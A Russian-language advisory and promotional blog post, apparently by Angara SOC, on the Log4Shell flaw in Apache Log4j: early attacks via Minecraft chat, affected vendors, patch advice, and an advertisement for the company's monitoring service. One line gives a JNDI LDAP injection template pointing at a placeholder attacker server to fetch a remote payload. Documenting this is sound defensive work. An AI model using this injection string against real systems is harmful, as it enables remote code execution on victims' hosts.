Log4Shell: обнаружена глобальная уязвимость Java-программ
Первые упоминания об эксплуатации уязвимости начали появляться на сайтах, обслуживающих пользователей игры Minecraft. В предупреждениях отмечали, что хакеры нацелены на выполнение вредоносного кода как на серверах, так и на устройствах клиентов с запущенной Java-версией Minecraft, применяя сообщения в чатах для манипуляции содержимым журналов целевых устройств.
Итак. Библиотека Apache Log4j — это популярный пакет для Java-программ, предназначенный для ведения журналов и трассировки. Она включена во множество популярных фреймворков таких, как Apache Struts 2 и Apache Solr, и активно применяется во многих популярных программных продуктах, в том числе Amazon, Apple iCloud, Cisco, ElasticSearch, Red Hat, Steam, Twitter.
Непосредственно уязвимость завязана на компоненте JNDI LDAP-коннектора, что позволяет злоумышленнику получить полезную нагрузку с удаленного сервера и выполнить ее локально на хосте жертвы с помощью запроса LDAP, как в примере ниже:
$ {jndi: ldap: // сервер_злоумышленника / полезная_нагрузка}
Специалисты в области информационной безопасности призывают пользователей как можно скорее обновить уязвимые продукты и внедрить решения по смягчению последствий. На текущий момент исправленной считается версия Log4j 2.16.0.
«Согласно статистике веб-сервер Apache занимает лидирующую позицию среди наиболее распространенных веб-серверов в глобальной сети Интернет. По этой причине и с учетом доступности эксплуатации обнаруженной уязвимости, возникшая угроза представляется глобальной. Киберпреступники активно сканируют доступные веб-сервисы на наличие уязвимости и успешно атакуют незащищенные хосты, поэтому в ряде случаев обновление небезопасного компонента станет лишь первым шагом на пути к устранению последствий уже произошедшего вторжения злоумышленника. Поэтому, в частности, для компаний очень важно сейчас не только перенести исправление на собственные проекты, но и проанализировать состояние защищенности всех устройств внутренней сети, предполагая, что она уже могла быть скомпрометирована», — отмечает Никита Струков, руководитель группы Центра киберустойчивости Angara SOC.
К сожалению, администрирование сразу нескольких ИБ-решений, используемых организацией, часто не позволяет оперативно выявлять инциденты ИБ и реагировать на них из-за нехватки квалифицированных кадров и разнородности возникающих событий. Качественно решить эту задачу поможет команда SOC. Специалисты Центра киберустойчивости Angara SOC, вооруженные необходимыми опытом и инструментами, готовы прийти на помощь, чтобы повысить операционную эффективность в части мониторинга событий ИБ и предоставлять заказчику информацию в формате, пригодном для принятия обоснованных решений в вопросах обеспечения защиты информации.
За подробностями о сервисе SOC можно обратиться к разделу «Центр киберустойчивости Angara SOC» нашего сайта, а также к менеджерам компании Angara Professional Assistance по e-mail info@angarapro.ru или телефону 8 (495) 269-26-07.